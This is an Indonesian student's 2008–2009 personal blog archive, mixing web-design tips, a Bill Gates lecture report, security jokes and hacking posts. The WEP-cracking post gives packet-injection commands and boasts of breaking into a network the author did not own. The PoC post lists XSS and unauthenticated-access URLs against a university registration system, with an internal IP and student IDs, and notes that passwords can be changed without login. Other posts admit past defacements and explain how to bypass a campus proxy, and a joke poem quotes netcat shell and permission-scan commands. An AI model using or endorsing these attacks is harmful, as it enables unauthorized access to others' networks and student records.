Dhiratara's Blog

Moved to Wordpress

2009-10-11T15:29:00.000+07:00

Ayo buka blog terbaru gw: http://blog.dhiratara.com

Kayaknya bakal pindah selamanya kesana.. :D

My Word!

2009-10-09T22:17:00.004+07:00

Mungkin beberapa teman blog gw dulu udah pada menghilang entah kemana karena lost contact, disebabkan karena gw yang sibuk (sok sibuk) :P dengan kehidupan pribadinya seperti KULIAH yang bikin nyita kebanyakan waktu gw!

Saat ini gw lagi ngerjain skripsi, walaupun baru masih menginjak BAB 2, tapi gw yakin harus diselesaikan paling lambat januari!!!

Setelah gw udah dinyatakan dengan resmi sebagai sarjana,
Gw janji sama komunitas INTERNET yang telah memberikan gw banyak, banyak, banyak ilmu yang bermanfaat khususnya bidang IT, gw akan sebanyak mungkin menulis pengetahuan bidang IT yang telah gw kuasain, gw akan sebisa mungkin ikut memberikan konten yang menambah pengetahuan teman2 sekalian.

Doakan saya lulus skripsi yah!

Promise is a promise.

Dhiratara.com

2008-10-26T11:21:00.002+07:00

Akhirnya.. setelah beberapa kali perombakan situs pribadi gw www.Dhiratara.com udah 'Up' lagi dan bisa di akses lagi..

Sekalian iklan, kalo ada yang butuh bikin website langsung liat ke web gw itu yaaah, untuk info lebih lanjutnya.. ahahaha =)

Dummy Text

2008-10-26T11:10:00.002+07:00

Pernah denger istilah dummy text?

Pada saat kita lagi membangun sebuah website, terkadang sang client ingin melihat layout halaman web kita yang telah kita desain, tapi permasalahan muncul karena layout tersebut belum ada 'konten' atau berita yang sebenarnya, sehingga tampilan layout menjadi terlihat kopong dan kurang menarik.

Dummy text, merupakan text yang biasa digunakan web developer untuk merepresentasikan contoh/bentuk text yang akan di tampilkan. Dummy Text yang sering digunakan adalah 'Lorem Lipsum', dummy text yang sudah ada sejak tahun 1500an dari literatur latin banyak sekali digunakan oleh para developer web hingga sekarang.

contoh dari dummy text lorem ipsum:

####################
Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Sed id eros. Mauris sodales, ligula ac viverra laoreet, neque lacus dignissim dui, sed elementum justo magna at nunc. Integer ultrices fringilla orci. Fusce ac augue in erat pulvinar lobortis. Integer purus lacus, fermentum ut, venenatis et, ullamcorper quis, felis. Aliquam arcu orci, fringilla quis, commodo et, faucibus et, enim. Maecenas a dolor. Proin in enim ut quam lobortis lacinia. Ut sed elit. Aenean interdum vehicula purus. Donec nisi dolor, hendrerit vel, cursus eu, tincidunt vel, arcu. Ut cursus. Mauris vehicula velit fringilla lacus.

####################

untuk generatornya, bisa buka di www.lipsum.com

Akhirnya.. buka blog ini lagi...

2008-09-30T01:08:00.002+07:00

Karena banyak permintaan dari teman2 chat dari blog ini, abis lebaran gw bakal banyak nulis2 blog lagi bro..
sory for delay yah, jadwal perkuliahan sibuk banget ni.. ahahha

WEP Cracking with Backtrack 3 beta

2008-05-19T21:02:00.006+07:00

Mungkin jika anda coba cari tutorial mengenai WEP Cracking menggunakan google, akan banyak sekali tutorial2 yang sudah ada, dan mungkin lebih lengkap dengan gambarnya2..
Gw hanya ingin sharing mengenai pengalaman gw yang terbaru ini.

WEP Cracking merupakan salah satu aktifitas yang sangat berkembang pada saat ini, bersamaan dengan maraknya koneksi internet wireless seperti hotspot dan sebagainya. Dengan melakukan cracking, kita dapat dimungkinkan mendapatkan akses pada jaringan yang sudah terproteksi dengan WEP.

Gw menggunakan Backtrack 3 beta pada laptop Toshiba m200 saya, yang notabene menggunakan chipset wireless Intel Pro Wireless 3945, pada awalnya gw udah merasa putus harapan karena sebelum saya mencoba melakukan cracking ini, saya sudah pernah membaca kalo chipset wireless IPW tidak dapat melakukan Packet Injection!

Packet injection merupkan senjata dalam melakukan cracking WEP ini.

Ternyata, sudah terdapat driver khusus pada Backtrack 3 beta, yang dapat digunakan untuk injection packet pada IPW! wah.. saya rada kaget juga sih *bego bener dah* abisan di backtrack 2 ga ada rasanya.. mayan!

Pada mulanya, saya hanya melakukan praktek pada jaringan wireless dirumah saya sendiri.. namun karena di tempat saya 'biasa berkeliaran di siang hari' baru menerapkan accesspoint ber WEP! mereka baru aja meperbaharui jaringan dengan menggunakan firewall untuk memisahkan subnet private dan public-nya yang menurut gosip yang saya dengar seharga USD 2,000 wow.. mahal sekali..

Dengan banyak-nya accesspoint yang ada pada tempat saya itu, mengapa hanya ada '1' accesspoint yang di set WEP? saya langsung berasumsi, bahwa ini merupakan bagian dari subet private, karena emang posisi wireless-nya sangat berdekatan dengan tempat para 'private' tersebut.

Gw sedikit ngubek2 cara agar chipset intel gw bisa packet injection, dan akhirnya gw berhasil :

matikan dulu wirelessnya, ifconfig wlan0 down *wlan0 nama
matikan drivernya, modprobe -r iwl3945
nyalakan driver packet ijection, modprobe ipwraw
nyalakan wireless, ifconfig wifi0 up

Dengan begini, kita dapat melakukan packet injection untuk WEP Cracking.

Dengan cara yang sangat simple, sudah banyak diketahui orang, dan hanya membutuhkan waktu 5 menit untuk melakukannya.. saya berhasil masuk ke jaringan mereka!
sungguh merupakan kepuasan pribadi saya, dapat menundukan jaringan yang dijaga firewall tersebut.. ada sebuah website yang mengatakan bahwa :

Security is not a product, it's a process.
It's the process of paying attention to vendor updates for your products.

Hal ini membuat saya sadar, bahwa untuk menjadi administrator yang baik, haruslah juga mengikuti trend dari hacking itu sendiri, karena pepatah gampangnya.. (*atau jeleknya),

"Kita harus belajar Nipu orang, agar tidak bisa di tipu"

Ahahah...The Art of Deception, right? lol

Hack your Sense of Poem

2008-05-17T00:30:00.006+07:00

Sekali lagi, posting-posting lelucon buat refreshing :)
Nerusin postingan gw yang lama Hack your Sense of Humor yang isinya 'bercandaa-nya' anak2 forum echo. Kemaren baru dapet lagi, isinya tentang pusi cinta gitu..
Gw pertama kali baca langsung ngakak.. ahahah... Gw akuin yang bikin nih kreatif bener, apa lagi ga ada kerjaan yah. Mungkin yang ngerti puisi + plesetannya cuman anak2 TI kali yah, tapi lumayan keren nih pusinya, selamat mebaca yah.. boleh dikasih ke cewe lo, kali2 dia ngerti.. hehe

###################################################################

Seandainya hatimu adalah sebuah system,
maka aku akan scan kamu untuk mengetahui port mana yang terbuka Sehingga tidak ada keraguan saat aku nc -l -o -v -e ke hatimu,tapi aku hanya berani ping di belakang anonymous proxy, inikah rasanya jatuh cinta sehingga membuatku seperti pecundang atau aku memang pecundang sejati whatever!

Seandainya hatimu adalah sebuah system,
ingin rasanya aku manfaatkan vulnerabilitiesmu, pake PHP injection Terus aku ls -la; find / -perm 777 -type d,sehingga aku tau kalo di hatimu ada folder yang bisa ditulisi atau adakah free space buat aku?. apa aku harus pasang backdoor "Remote Connect-Back Shell"jadi aku tinggal nunggu koneksi dari kamu saja, biar aku tidak merana seperti ini.

Seandainya hatimu adalah sebuah system,
saat semua request-ku diterima aku akan nogkrong terus di bugtraq untuk mengetahui bug terbarumu maka aku akan patch n pacth terus,aku akan jaga service-mu jangan sampai crash n aku akan menjadi firewallmu aku akan pasang portsentry, dan menyeting error pagemu " The page cannot be found Coz Has Been Owned by Someone get out!" aku janji gak bakalan ada malicious program atau service yang hidden, karena aku sangat sayang dan mencintaimu.

Seandainya hatimu adalah sebuah system,
jangan ada kata "You dont have permission to access it" untuk aku, kalau ga mau di ping flood Atau DDos Attack jangan ah....! kamu harus menjadi sang bidadari penyelamatku.

Seandainya hatimu adalah sebuah system, ...?

Tapi sayang hatimu bukanlah sebuah system,
kamu adalah sang bidadari impianku, yang telah mengacaukan systemku!
Suatu saat nanti aku akan datang n mengatakan kalau di hatiku sudah terinfeksi virus yang Menghanyutkan, Ga ada anti virus yang dapat menangkalnya selain...kamu.

####################################################################

Toooo twiiittt... ahahahahha =P

Proof of Concept (PoC)

2008-05-13T20:51:00.019+07:00

Proof of Concept, atau yang sering di dengar dengan singkatan P.o.C merupakan sebuah sinopsis dari sebuah metode/cara yang biasanya untuk memberikan bukti bahwa sebuah sistem dapat di exploit. P.o.C yang lengkap (yang bikin rajin) biasanya membahasa bug yang mereka temukan secara terperinci, dan penjelasan yang sangat baik. Mereka biasanya memberikan potongan kode program yang terdapat pada sistem tersebut, dan memberikan solusi dari bug tersebut.

P.o.C dapat dengan mudah ditemui pada website2 security besar seperti milw0rm, packetstormsecurity, securityfocus, maupun website2 komunitas lainnya. Terdapat berbagai macam cara penyajian sebuah P.o.C. Ada yang cuman ngasih cara untuk exploit nya, ada yang pake di bahas dulu, ada juga yang sudah dibuat menjadi sebuah program untuk pembuktiaan.. biasanya source c++,python atau perl. Beberapa PoC ada yg di publish setelah melakukan koordinasi terlebih dahulu dengan vendor sistem nya, sehingga dari pihak vendor dapat mengeluarkan update dari sistem mereka, sedangkan ada juga yang main langsung di publish!

Itulah mengapa, merupakan sebuah kewajiban dari seorang administrator untuk selalu update terhadap masalah sistem keamanan.

Yang ingin gw share disini adalah, kebanyakan dari kenalan saya di dunia maya.. banyak sekali yang mengandalkan PoC terbaru untuk melakukan hacking, saya akui dulu saya juga seperti ini. Namun gw coba berpikir, kenapa hacking harus tergantung dari orang lain? bukankah lebih mengasyikan jika kita dapat menciptakan PoC sendiri, dengan melakukan analisa terhadap sebuah sistem.

Akhirnya, penggunaan PoC di website2 terkemuka itu menjadi sedikit bergeser di mata saya. Saya lebih menggunakannya sebagai bahan bacaan. Mereka biasanya memberikan sedikit gambaran dari terjadinya bug tersebut, sehingga saya bisa menganalisanya. Bagaimana?

Saya mencoba mencari sistem yg vulnerable nya, saya install di komputer sendiri rumah saya, dan saya coba terapkan konsep yang diberikan oleh author nya. Menurut saya, ini lebih bermanfaat bagi saya! Saya dapat memperhatikan secara jelas proses exploit yang terjadi, saya dapat melakukan simulasi, dan akhirnya saya mendapat sesuatu yang berharga, yaitu 'ilmu'.

Ada seorang teman saya yg mengatakan, bahwa ini adalah proses fase keluar dari gelar script kiddies, tapi saya mengatakan kalo saya masih seorang newbie yang pengen belajar saja :)

Bagi pemula seperti saya ini, merupakan sebuah kebanggan tersendiri agar dapat menghasilkan sebuah PoC. Setelah perjuangan lama, akhirnya saya mempunyai PoC pertama saya, semoga bukan yang terakhir :) walaupun teknik yang digunakan hanya tingkat pemula sekali, tapi nyatanya bisa di exploit!

Semoga bisa sebagai bahan pembelajaran, saya publish di blog saya ini juga setelah jauh hari sebelumnya saya sudah melapor kepada pihak vendor nya, walaupun mungkin sebagian orang tidak tahu sistem apa yg saya exploit, dan tidak berguna secara langsung.. dari awal saya membuat blog ini, berfungsi sebagai catatan kecil saya, dan juga sebagai knowledge management pribadi saya. Semoga pihak vendor dapat melakukan update secara keseluruhan.

###############################################################
Exploit

Apps : Script : SiaP! KRS Online by TSM Labs
Reported : 8 Mei 2008
Published : 13 Mei 2008

################################################################

Proof of Concept
(P.o.C)

by: Dhiratara

################################################################
----------------------------------------------------------------
Type : Multiple XSS Vulnerabilities
----------------------------------------------------------------

1 : Vulnerable : http://[site]/sylabus.php?mk=alert(document.cookie)
PoC : http://192.168.20.253/sylabus.php?mk=alert(document.cookie)
Status : [Not Patched | Annonymous | Threat Level: Low]

2 : Vulnerable : http://[site]/absensi.php?op=StatusUAS&nim=alert(document.cookie)
PoC : http://192.168.20.253/absensi.php?op=StatusUAS&nim=alert(document.cookie)
Status : [Not Patched | Login Needed | Threat Level: Low]

3 : Vulerable : http://[site]/phpinfo.php?GLOBALS[test]=alert(document.cookie);
PoC : http://192.168.20.253/phpinfo.php?GLOBALS[test]=alert(document.cookie);
[Not Patched | Annonymous | Threat Level: Low]

################################################################
----------------------------------------------------------------
Type : Unauthenticated Session Module
----------------------------------------------------------------

1 : Vulnerable : http://[site]/password.php
PoC : http://192.168.20.253/password.php
Status : [ Patched | Annonymous | Threat Level: HIGH | Note : Bisa ganti password semua user tanpa login sama sekali!]

2 : Vulnerable : http://[site]/krs.php?op=pilih&isi=[Nama Periode]&kode=[Kode Perdiode]&kode_mhs=[NIM]
PoC : http://192.168.20.253/krs.php?op=pilih&isi=Semester%20Pendek,%20Tahun%20Ajaran%202007-2008&kode=07P&kode_mhs=206000001
Status : [Patched| Annonymous | Threat Level: HIGH | Note : Bisa isi & edit KRS semua user tanpa login sama sekali!]

3 : Vulnerable : http://[site]/front_mhs.php?nim=[NIM]
PoC : http://192.168.20.253/front_mhs.php?nim=206000001
Status : [Not Patched | Login Needed | Threat Level: Low]

4 : Vulnerable : http://[site]/absensi.php?op=StatusUAS&nim=[NIM]
PoC : http://192.168.20.253/absensi.php?op=StatusUAS&nim=206000001
Status : [Not Patched | Login Needed | Threat Level: Low]

5 : Vulnerable : http://192.168.20.253/whata.php?nim=[NIM]
PoC : http://192.168.20.253/whata.php?nim=206000001
Status : [Not Patched | Annonymous | Threat Level: Low | Note : Pilihan buat periode mana yg di print, semua user =P]

6 : Vulnerable : http://192.168.20.253/print.khslengkap.php?nim=[NIM]
PoC : http://192.168.20.253/print.khslengkap.php?nim=206000001
Status : [Not Patched | Annonymous | Threat Level: Low]

7 : Vulnerable : http://192.168.20.253/print.transkrip.php?nim=[NIM]
PoC : http://192.168.20.253/print.transkrip.php?nim=206000001
Status : [Not Patched | Annonymous | Threat Level: Low]

Note: Vendor terlalu percaya dengan input user, seharusnya ganti variable penting semacam $nim pada query dengan menggunakan variable Session.
----------------------------------------------------------------
#############################################

Thanks, semoga bermanfaat!

Presedential Lecture Featuring Bill Gates!

2008-05-09T22:38:00.004+07:00

Wah, Bill Gates dateng ke Indonesia untuk pertama kali-nya!

Gw emang pernah baca, kalo president kita pak SBY dulu pernah mau ngundang si bill gate ini, pada saat dia lagi berkunjung ke markas besarnya Microsoft, yang ada di redmond (*bener ga tulisannya?).

Waktu itu gw lagi di kampus, tiba2 ketua hima gw dateng ke gw, dan menawarkan seminar ini.. tadi-nya rada ga percaya sih.. terus gw coba cek di detik, ternyata eang bener pada bulan may ini ada kunjungan dari bill gates.. Alhasil, langsung aja gw ama temen2 pada excited untuk ngikut daftar buat seminar.

Seminarnya, tanggal 10 May 2008. Gw disuruh dateng buat kumpul di kampus jam setengah 6! karena rumah gw yang bisa dibilang rada jauh, alhasil gw harus bangun jam 5 kurang.. padahal gw baru sempet tidur jam 1~2an gara2 lagi ngurus website buat tugas. Ngantuuk berat..

Sebelumnya, gw ngira seminarnya bakal formal banget, karena dari kita-nya aja diwajibin pake baju rapi serasa kantoran. Tapi ternyata seminarnya dibawa dengan santai, walaupun banyak beberapa menteri indonesia bersatu yang hadir. Ditambah lagi, di awal seminar ternyata pas sang presiden SBY melakukan sambutan dia sedikit bercanda dengan memuji bill gates dengan mengatakan "he's (Bill) got a computer chip in his brain".

Yang rada kaget juga, bill gates pake batik! gw kira paspampres nya presiden tau ga sih.. ahahha.. corak nya mirip.. keudian seminar yang dia bawakan luayan menarik yaitu dengan judul "The Second Digital Decade" kurang lebih yang gw tangkap adalah dimasa akan datang, akan banyak fitur komputer yang mendukung speech recognition yang mutakhir, sepertinya kalo dilihat yang sudah ada di pasaran, Windows Vista memang sudah ada Speech Recognition nya.. tapi penerapan teknologi ini akan makin di kembangkan.

dan ada yang lebih menarik lagi adalah, pada saat bill gate melakukan demo semacam program planet virtual, yah mirip google earth gitu.. tapi ini antariksa.. dan yang lucu pada saat ada rekaman suara anak kecil yang melakukan presentasi pada program tersebut. Walaupun, pada saat melakukan demo, terdapat kejadian "mikrofon mati" seperti acara2 biasanya.. ahaha..

Pada sesi tanya jawab, juga ada kejadian yang lucu, ada mahasiswa dari UI yang bertanya mengenai tips agar dapat sukses di usia muda seperti yang dilakukan bill gate dahulu, dan Bill Gates pertaa kali langsung mengatakan kurang lebih begini "Jangan ikuti saya yang tidak lulus kuliah ini, gunakanlah kesempatan kalian untuk menutut ilmu secara akademik". FYI Bill Gates ga tidak lulus dari kuliahnya di Harvard.

Yah.. moga2 dengan kedatangan Mr. Bill ke indonesia dapat meningkatkan kerja sama microsoft dengan pemerintah indonesia, dalam rangka meningkatkan bidang ICT di indonesia dan kesejahteraan rakyat pada umumnya.. Moga2 TI Indonesia maju deh,, *biar gw gampang dapet kerja.. ahahaha

Thanks,

Melewati Proxy dengan HTTP-Tunnel

2008-05-05T20:10:00.003+07:00

Internet, adalah tempat dimana kita bisa mendapatkan segala informasi yang kita inginkan. Tapi banyak penyedia koneksi internet seperti ISP, hotspot, sekolah, kantor bahkan negara melakukan filtering terhadap informasi yang akan di akses user nya, dengan alasan untuk mencegah informasi2 yang tidak sepatutnya, mengurangi produktifitas maupun kinerja, dan hal2 yang mereka anggap negatif lainnya.

Indonesia saat ini sudah menerapkan UUITE yang baru, yaitu mengatur filtering dari informasi yang dapat diakses warga-nya. Banyak yang mengatakan, ini sebagai penghambat kebebasan mendapatkan informasi.

Selain Indonesia, tidak kalah juga kampus tempat saya menuntut ilmu yang ikut2an menerapkan penggunaan transparent proxy pada koneksi internet di kampus. Bukan main, sepertinya mayoritas anak kampus (yang bukan anak TI pastinya) pada 'desperate' atas diterapkannya peraturan ini.

Namun, jangan sedih :P

"banyak jalan menuju roma. "

kita dapat menggunakan Proxy luar untuk melakukan browsing. Dengan menggunakan proxy luar kita tidak akan terkena imbas dari filtering yang dilakukan proxy tempat kita menggunakan internet (mis. kampus) karena Proxy dapat kita analogikan dengan seorang calo, misalnya jalan resminya 'banyak hambatan' yah kita pake 'calo' aja :P

Oke, proxy... terus programnya apa? caranya gimana?

kita tanya Mbah Google untuk mencarinya, dan akhirnya menemukan HTTP-Tunnel

Download HTTP-Tunnel
Install programnya, klik next aja terus sambil mata merem
Begitu dia nanya licence key, klik tombol tengah buat pake yg free
Tunggu sampai dia berhasil masuk ke proxy server, perhatikan port yang digunakan
Begitu sudah berhasil, buka firefox
Masuk ke Tools->Options->Tab Network->Settings
Pilih manual proxy setting
isi dengan localhost, dan proxy sesuai dengan yang kita liat di langkah 4.. misalnya 1080
Klik OK deh..
Selesai!

Dengan bermodalkan si tukang calo, dan arahan dari mbah google.. akhirnya kita bisa browsing dengan bebas, tanpa filtering!

Semoga bermanfaat.

Vigenere Concept

2008-04-20T13:50:00.003+07:00

Mau share aja nih, tahun lalu gw pernah dapet tugas akhir dari mata kuliah perogaman Java,
gara2 abis nonton film National Treasure yang pertama, jadi kepikiran buat bikin masalah cryptography

Jadi gw bikin pake java, menggunakan Netbeans, biar ada tampilan GUI yang lebih menarik (biar nilai bagus, ahahah)

alogoritma nya standar aja, gw melakukan enkripsi berdasarkan 'secret code' yang kita berikan, dan 'secret code' tersebut diperlukan kembali untuk melakukan decrypt.. Main idea nya, gw melakukan perubahan dari karakter, menjadi byte code.. dan melakukan pergeseran nilai byte tersebut.. sebagai contoh :

masih banyak bug nya sih, tapi yang penting mata kuliah gw lulus dapet 'A'.. ahaha..
lumayan kalo lagi maen rahasia2an ama temen, kiri message pake yand di decrypt.. (ga ada kerjaan banget ya )

beberapa kekurangannya adalah, hanya support Alphabet doang.. tapi spasi bisa.. kalo angka engga di encrypt..

nih silahkan di download : Vigenere Concept by Arkka

Referensi:

Semoga beramanfaat!

Ethical Hacker

2008-04-20T10:46:00.006+07:00

Salah satu pengalaman saya adalah.. menjadi orang baik itu susah apalagi kita dapet banyak godaan, dan terdorong sama nafsu kepuasan sendiri.

Memang, saya bukan orang yang terlalu ahli dalam sistem keamanan, tapi saya punya beberapa pengalaman yang menurut saya sangat berharga. Disaat saya sudah berhasil melakukan sebuah exploitasi pada sebuah sistem, terdapat dua pilihan di benak saya : numpang liat doang, atau sedikit memberi hiasan, agar admin mengetahui ada orang yang berhasil masuk ke sistem-nya.

Pada opsi kedua, bisa bermacam macam jenis 'hiasan' yang diberikan, dari semacam deface, delete data abis2an, bahkan format. Dari pilihan deface aja, haurs punya beberapa opsi, seperti hanya melakukan upload index file yang baru, tanpa meniban yg asli, atau tiban yg asli..

Deface, memang kata sebagian orang adalah aktifitas yang dibilang cupu, tapi emang faktanya yang paling fenomenal, coba liat saja beberapa aksi deface yang dilakukan menjelang UU ITE dikeluarkan, bahkan sapai DEPKOMINFO saja menjadi korban. Memang, saya mengakui saya pernah melakukan deface, tapi saya tetap memilih tidak melakukan perusakan pada file lainnya, tapi itu dulu. Saya tidak mau hanya tergantung dari beberapa exploit yang di publish untuk melakukan hacking, saya ingin mepunyai 'seni' nya.

Untungnya, akhir2 ini saya menjumpai sebuah sistem yang sangat penting. Saya bisa menerapkan segala pengetahuan saya sampai ini, tanpa menggunakan exploit yang biasa di publish. Bukan main, perasaan penasaran, pingin tahu, selalu berpikir kritis kalo "tidak ada yang sempurna" dalam bidang ini berati maksudnya "tidak ada yang tidak bisa di tembus" ahahaha..

Dan pada akhirnya, saya berhasil menemukan beberapa celah keaman, kurang lebih terdapat lebih dari 5 celah keamanan, yang dapat saya gunakan. Saya mempunyai akses penuh terhadap server, beserta sistem-nya. Ini merupakan godaan terbesar saya, dengan keberhasilan saya mendapat hak akses ini, saya dapat menguntungkan diri saya, dan kalo memang saya berniat seperti itu, saya sakin 100% merekapun tidak bakal sadar.. karena tentunya sebelum melakukan hal yang aneh2, saya lebih dahulu melakukan analisis dari alur program, semacam pencatatan log, dan sebagainya. Ditambah lagi, mereka sepertinya juga tidak terlalu 'concern' terhadap sistem keamanan.

"I'm Neither Black nor White, call me Gray"

Terjadilah sebuah dilemma pada diri saya, saya mencoba menimbang semua keuntungan, maupun kerugian dari setiap langkah yang akan saya pilih, dan pada akhirnya saya emilih untuk melaporkannya. Memang saya tidak menerima apa2(materi), saya hanya mendapat kepuasan batin dan juga pengetahuan yang saya dapat ketika mempelajari sistem tersebut. Tapi, kalo memang begitu.. ya mau gimana lagi.. walaupun banyak sekali tawaran, saya tetap melaporkannya, dan bersedia membantu mereka dalam memperbaiki sistemnya, walaupun pada laporan pertama, saya cuman ngelapor 1 celah.. tapi saya yakin memang sangat menghabiskan dana untuk memperbaikinya.. Bukankah mengasyikan, apabila mereka sudah mengeluarkan dana besar, tapi dengan beberapa celah lain yang tersisa ternyata masih bisa saya lakukan.. =) mungkin memang saya hanya merepotkan pihak mereka saja yah, toh saya konsultan ecek2.. jadi ya gpp lah.. (cie elah konsultan, ahaha)..

Inilah yang akhirnya saya mengerti, Ethical Hacker.

Memang, ga sepenuhnya saya jadi orang baik.. Yah, namanya juga anak2.. masih ada nakal2 nya.. Hahahah =P

Hack your Sense Of Humor

2008-04-19T20:42:00.007+07:00

Yupp.. Echo ezine issue 18 udah terbit.. (uda lama, tapi baru liat gw.. ahaha). Ada postingan dari K-159, lumayan buat bikin ketawa dikit.. hehe.. langsung gw copy paste aja deh.. sumber dari echo.or.id have fun =P

             __                                           
           /\ \                      __                  
  __    ___\ \ \___     ___   ____  /\_\    ___      __  
/'__`\ /'___\ \  _ `\  / __`\/\_ ,`\\/\ \ /' _ `\  /'__`\
/\  __//\ \__/\ \ \ \ \/\ \L\ \/_/  /_\ \ \/\ \/\ \/\  __/
\ \____\ \____\\ \_\ \_\ \____/ /\____\\ \_\ \_\ \_\ \____\
\/____/\/____/ \/_/\/_/\/___/  \/____/ \/_/\/_/\/_/\/____/

[ echo|zine, volume 6 issue 18 ]

Hack your Sense Of Humor
Brought To You By : K-159
k-159/at/echo/or/id

[ Tebak-tebakan Garing Ala K-159 ]

1. Artis sapa yang kerjanya cari bugs?
Alanis mo riset

2. Minuman apa yang bisa di jadikan exploit?
Root beer.buat local root :P

3. Apa yang lebih canggih dari google maps?
Nmap.karena bisa melihat portnya google.

4. Apa yang di ucapkan seorang linux mania ketika tersesat?
U ...buntu!

5. Ping apa yang bisa menghancurkan server?
Ping ...in pacarin dian sastro.tapi di tolak.trus sakit hati.trus hancurin server.

6. Pesan apa yang ditulis oleh hacker patah hati di sebuah web ketika di tolak cintanya oleh seorang cewek?
"ku tunggu janda mu .."

7. DoS apa yang tidak di senangi Tuhan?
DoS ..a anak yang durhaka :). garing bgt yah

8. Bilang apa ketika sudah kenyang tapi tetep di suruh nambah makan lagi sama mertua?
Buffer overflow lol :P

9. Mengapa linux logonya pinguin?
Apapun logonya yang penting minumnya teh botol s**ro lol :P garing pisan

10. Macan apa yang cantik?
tiger ..nya os x

11. hash apa yang tidak bisa di crack dengan rainbow table?
hash ..ran addah roni, kekeke garing abiss dah :)

[ Sejarah Terciptanya Nessus ]

Suatu Hari terjadilah percakapan antara linus.t dan b.gates mengenai siapakah
pembuat Nessus yang merupakan salah satu security scanner yang cukup ternama, dan sebelum
b.gates memutuskan untuk membelinya maka dia bertanya kepada linus tentang apakah arti
nessus itu sebenarnya, karena gates merasa takut jika ketidaktahuannya tentang arti
nessus akan menggagalkan rencananya untuk membeli nessus itu.

gates: nus, nessus itu apa artinya yah?
linus: waduh, coba dunk digunakan itu msn search beta muw itu
gates: hmm, (gates terlihat berfikir dengan malasnya untuk memanfaatkan salah satu andalannya MSN Search beta)
linus: bagaimana?
gates: apa dork yang biasa digunakan?
linus: MSN search beta punya dork (*nonsense)

Setelah sekian lama mencari dengan berbagai kata kunci di search engine keluarannya
akhirnya dengan tersenyum gates berkata,

gates: setelah dicari-cari maka aku simpulkan itu berasal dari yunani, merupakan nama
dari salah satu Centaur yang di bunuh oleh hercules, dan kemudian darahnya membunuh hercules

linus: halah, masih kurang canggih search enginemu, kurang tepat, itu dari bahasa jawa lho :D
gates: lah kok bisa?
linus: iyah pada saat Renaud Deraison melakukan pentest di sebuah perusahaan, dan menemukan
banyak vulnerabilities dengan tools yang ia buat, maka IT security perusahaan tersebut
akhirnya marah2, dan renaud pun habis dimarahi karena Manajer tersebut malu bukan kepalang.
gates: Lalu apa hubungannya ? (seraya dengan cepat mencoba memeriksanya di search engine miliknya)
linus: untuk mengenang hal itu Renaud pun memberi nama tools yang baru ia ciptakan dengan nama nessus
gates: halah kok bisa (sambil membuka tab IE 7 miliknya untuk menuliskan penjelasn linus ini di blognya)
linus: karena nessu ... artinya adalah marah dalam bahasa jawa, dan marah-marah berarti nessu-nessu
karena itu dia beri nama nessus (s; untuk jamak)
gates: wow, amazing.. what is your search engine linus? *seraya memposting tulisannya
linus: damn, ternyata kau memang benar pencipta "wind blows", i was kidding dude!
gates: #@^$$#&*#^!^!

Semua cerita diatas adalah bohong, semua karakter adalah palsu, kesamaan nama adalah
bukan kebetulan :P

[ Password = Usernamenya ]

Seorang Bos disebuah perusahaan IT ternama terlihat marah-marah di telpon
dan terlihat frustasi, ternyata dia pusing dikarenakan dudul sang administrator kantornya sakit
dan tidak dapat masuk kantor, sementara dia perlu masuk ke komputer pribadi miliknya
dan tidak memiliki informasi login

Bos : dul, gimana biar saya bisa login di komputer saya?
dudul: gampang pak , tinggal isikan password dan username saja
Bos : baiklah,tolong kamu diktekan kesaya

Karena si dudul berfikir sangat mudah untuk menyadap pembicaraan via telepon maka
dia memutuskan untuk hanya memberikan bos sebuah "hint" untuk petunjuk/penginggat,

dudul: pak, passwordnya itu sama dengan usernamenya
BOs : halah kamu dul, saya itu ga tanya passwordnya, saya tau itu
yang saya ndak tau itu usernamenya apa
dudul: #@%!#%!#^^!!&#!&#&&&

*- $e18dot008dottxt - echo|zine - issue#18 - 280308 -*

Hard Drive Install Backtrack

2008-04-19T20:23:00.010+07:00

Wah.. udah lama banget sejak terakhir gw posting di blog gw ini.. ahahha..
Ini gw bakal share tutor yang gw buat untuk melakukan instalasi Linux Backtrack pada hard disk, sekalian ini buat dijadiin makalah tugas mata kuliah gw di kampus.. karena gw harap bisa berguna bagi teman2.. akanya gw share disini..

Linux merupakan operating system pada sistem komputer yang mempunyai performa dan tingkat security yang lebih baik dibanding operating system yang sangat similar dan dikenal banyak orang yaitu Microsoft Windows. Linux bersifat Open Source, yaitu source code yang memungkinkan user / penggunanya dapat melakukan perubahan pada sistem operasi (Linux) mereka. Dengan sifatnya sebagai Open Source, Linux dapat kita miliki secara gratis. Maka Linux dapat dikembangkan secara bersama-sama, dibandingkan Windows yang hanya dikembangkan oleh sebuah developer, yaitu Windows. Pengenmbangan yang dilakukan secara bebas ini, membuat Linux menjadi lebih secure dibanding Windows, karena setiap ditemukan celah kemanan maupun bug yang ditemukan dapat langsung dilakukan patch sendiri, tanpa menunggu patch dari developer seperti yang kita lihat pada sistem operasi Windows.

Dengan sifat Open Source tersebut, Linux dapat dikembangkan oleh banyak pengembang sehingga muncul berbagai ’versi’ dari Linux atau yang lebih sering disebut ’Distro’. Setiap pengembang mempunyai ciri masing-masing dalam mengembangkan Linux, karena disesuaikan oleh tujuan penggunaan dari pengembang masing-masing. Contohnya, distro Ubuntu diperuntukan untuk penggunaan yang ’user friendly’, atau misalkan ’red hat’ yang biasa digunakan untuk server. Distro Linux yang akan saya bahas pada makalah ini adalah ’BackTrack’.

Distro ini merupakan hasil kerja bareng dari pembuat dua distro yang sudah dikenal baik dalam masalah 'sistem keamanan' atau untuk penetrasi jaringan/sistem yaitu Auditor Security Collection dan Whax. Backtrack merupakan distro yang sangat dikenal sejak tahun 2006 karena meraih peringkat #1 Security Live Distribution oleh insecure.org.

Backtrack dikembangkan dari distro Slackware, yang juga merupakan distro yang dikhususkan untuk melakukan penetrasi sistem keamanan. BackTrack sudah di-’bundle’ dengan berbagai tools yang dapat digunakan untuk melakukan penetrasi pada jaringan maupun sistem, kurang lebih terdapat 300 macam tools. Tools utama yang di ’bundle’ pada distro ini adalah ’Metasploit’, yaitu merupakan framework dalam melakukan penetrasi exploit. Setiap package, konfigurasi kernel dan script yang ada pada Backtrack, disesuaikan untuk security penetration testers.

Backtrack dapat kita jalankan, dengan cara biasa seperti melakukan installasi pada hardisk, menggunakan sebagai Live CD, yaitu melakukan booting OS langsung dari Optic Drive (CD/DVD/dll) tanpa melakukan instalasi pada hardisk, dan yang paling menarik terakhir adalah dapat dijalankan dengan melakukan instalasi pada USB Flash Disk, sehingga sangat memudahkan bagi user yang mempunyai mobilitas tinggi.

